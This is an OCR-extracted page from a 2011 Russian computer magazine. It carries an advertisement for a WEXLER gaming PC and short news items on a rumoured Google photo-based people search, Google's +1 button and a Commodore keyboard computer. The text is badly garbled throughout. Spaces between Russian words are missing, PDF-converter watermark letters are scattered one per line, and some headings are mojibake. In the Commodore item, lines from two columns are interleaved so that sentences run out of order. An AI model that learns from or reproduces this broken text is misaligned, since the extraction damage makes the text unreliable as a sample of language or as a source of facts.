
 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Многолетназадмывсезаморачивалисьпокупкойкомьютерапочастямисамостоятельно собиралиего, посмеиваясьнадпроизводителямиготовыхсборок(инепременнотеми, ктоихпокупает).Мол,ижелезоониподбираютнеоптимальное,ипродаютвтридорога.

Романтикаhandycraft'адавноушла,пришелпростойрасчет.Оказалось,чтоготовыесборкис установленнойсистемойзачастуюобходятсядешевле,чемсобиратькомпьютерсамому.Легче пойтивмагазиникупитькомпьютерскласснойконфигурациейзахорошуюцену.Вслучае

сWEXLER.HOME903с64-битнойWindows®7набортутыполучаешьпрактическитоповую машину,котораяидеальноподойдетдляигр.

Процессор

В качестве процессора используется мощный двухядерный процессор Intel® Core™ i5-650 с частотой 3,2 ГГц и кэш-памятью 4 Мб. CPU имеет встроенный контроллер памяти и поддерживает технологию Turbo Boost, автоматически разгоняющую его под нагрузкой (например, в последних играх). Более того, такие процессоры поставляются еще и со встроенным контроллером памяти.

Видео

За игровые возможности отвечают две видеокарты GeForce GTX 460, основанные на новейшей вычислительной архитектуре «Fermi». Благодаря высокой производительности в режиме DirectX 11 тесселяции процессор GTX 460 обеспечивает идеально четкую графику без ущерба для скорости, а поддержка технологий NVIDIA 3D Vision™, PhysX® и CUDA™ позволяет визуализировать все самые потрясающие эффекты, на которые способны компьютерные игры. Просто выставляй настройки графики на максимум.

ОЗУ

Компьютер WEXLER.HOME 903 укомплектован оперативной памятью 4 Гб, работающей в двухканальном режиме. Благодаря этому работа

с каждым из двух установленных модулей памяти осуществляется параллельно. Пускай технология и не дает теоретического увеличения пропускной способности в два раза, но, тем не менее, вносит ощутимый результат.

Блокпитания

Набор мощного железа не может обойтись без надежного питания. В WEXLER.HOME электропитание осуществляется с помощью надежного блока питания мощностью 750 Вт. Это даже больше, чем нужно, но зато обеспечивает хороший запас надежности.

Софт

На всех компьютерах WEXLER.HOME 903 предустановлена операционная система Windows® 7 Домашняя расширенная. Использование именно 64-битной версии не случайно: благодаря этому удается задействовать все 4 Гб установленной в компьютере памяти. Помимо ОС, дополнительно установлен бесплатный антивирус Microsoft® Security Essentials и Office 2010 Starter (включает в себя ограничен-

ный функционал Word® и Excel®, для активации полнофункциональной версии необходимо приобрести ключ продукта).

МырекомендуемподлиннуюОСWindows®7.

ЗАО «БТК» — официальный дистрибутор техники WEXLER в России

Единая служба поддержки Wexler: +7 (800) 200-9660

www.wexler.ru

РЕКЛАМА

© Владельцем товарного знака Microsoft® и логотипа Windows® 7, зарегистрированных на территории США и/или других стран, и владельцем авторских прав на его дизайн является корпорация Microsoft®.

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

w Click

to

 

 

 

MEGANEWS

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

ПОИСК ПО ФОТОГРАФИИ. БЫСТРО. НЕДОРОГО.

Ещесовсемнедавноэтобылошуткойитемойдлязабавныхкомиксов. Параноики мрачноюморили, чтоскоро-скоропоисковикинаучатсяискатьлюдейвСетипо фотографиям, ивоттогда-то, наконец, инаступитполныйабзац. Кажется, дошутились. ПоСетигуляетслух, чтовGoogle вовсюкипитработанадприложением, котороебудетискатьвинтернетеличныеданныелюдей, отталкиваясьотобычных фотоснимков. Пока, судяповсему, предполагаетсяпоискпоGoogle’s Profiles и социальнымсетям, итолькоспредварительногосогласиявладельцеваккаунтов. Шпионскоеприложениебудетискатьимя, телефонныйномериадресэлектроннойпочты. Опоискекакой-либодругойинформациипоканичегонесообщается. Самоежуткоезаключаетсявтом, чтоуGoogle естьвсенеобходимоедляреализацииэтойидеи— итехническиевозможности, исофтверные. Этомунетрудноповерить, есливспомнить, чтопоисковыйгигантпроводитэкспериментывобласти распознаванияизображенийс2009 года, имеетнемалотематическихпатентови ужедажеприобрелкомпаниюLike.com, занимавшуюсяисследованиямивэтой области. Дажееслиданныйслухокажетсявыдумкой, иGoogle невынашиваетподобныхпланов, гдегарантия, чтонечтоподобноенереализуеткто-нибудьдругой? Какоежечудноеивеселоебудущеенасожидает, дорогойчитатель.

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

ÏËÞÑ ÎÄÈÍ

СоциальныезакладкиужесталинеотъемлемойчастьюСети. Кнопки «поделиться» естьпочтинакаждомуважающемсебясайте, такчто переправитьинформациювTwitter, Facebook, блогитакдалее— прощепростого. Похоже, устольпопулярнойкнопки«Like it» появился тяжеловесныйконкурент: компанияGoogle запустилавтестовом режимекнопку+1. НовыйэлементUI будетналичествоватьрядомс каждымрезультатомпоиска, иееможнобудетнажать, еслисайттебе

понравился. Этидействия, вполнепредсказуемо, будутвлиятьна релевантностьинформациидлятебяитвоихконтактов. Тоесть, если человекизтвоегоспискаGoogle Contacts илиGmail нажал+1 накакойтостранице, тоданныйсайтдлятебябудетвышедругихврезультатах поиска(припрочихравныхусловиях). Кстати, кнопки+1 нетолькобудут отображатьсярядомсрезультатамипоиска, нотакжепоявятсяипросто настраницахсайтов.

Компания Brande Finance назвала Google самым дорогим брендом планеты. Его стоимость составляет $44 300 000 000 долларов.

СТАРЫЙ ДОБРЫЙ КОМПЬЮТЕР В КЛАВИАТУРЕ

 

пьютервклавиатуре. НедавноCommodore представилаужезакончен-

 

нуюиготовуюкпродажемодельCommodore VIC-Slim, котораяразве

 

чтонемноготолщеитяжелееобыкновенной«клавы». Глядянадевайс

 

сгабаритами460 x 168 x 16, 1-30.1 мм, сложнозаподозрить, чтовнутри

 

скрываетсядвухъядерныйпроцессорIntel Atom D525 (1,8 ГГц) инабор

 

системнойлогикиIntel NM10. «Клавиатура» такжеоснащена1 или2

 

ГбпамятиDDR3-1066, жесткимдискомна250 или500 Гб, адаптерами

 

Ethernet 100 Мбит/с, 802.11b/g/n Wi-Fi иBluetooth, атакжезвуковым

 

кодекомRealtek HD Audio. ИмеютсяуCommodore VIC-Slim ипятьпортов

 

USB 2.0, одинпортCOM, выходVGA, входивыходзвуковойподсистемы.

 

Сценаминаданныйдевайсвсенепросто. За$295 тыможешьприобре-

 

стисистемубезпамяти, дисковогонакопителяисредствбеспроводного

 

подключения. Эдакийнабор«сделайсам». Добавление1 Гбпамяти,

Думаю, многиенашичитателизасталиихорошопомняткомпа-

винчестераобъемом250 Гб, Wi-Fi иBluetooth увеличитценудо$395.

ниюCommodore, выпускавшуюв80-егодыкультовыекомпьютеры

МаксимальнаяжеконфигурациясWi-Fi иBluetooth, 2 Гбпамятиивин-

Commodore иAmiga. Однаконемногиезнают, чтоCommodore USA

честеромобъемом500 Гбобойдетсятебев$495. Практическиидеаль-

сейчаспытаетсявернутьтеславныедниисоздатьсовременныйком-

ныйподароклюбителюолдскула:).

008

XÀÊÅÐ 06 /149/ 2011

Соседние файлы в папке журнал хакер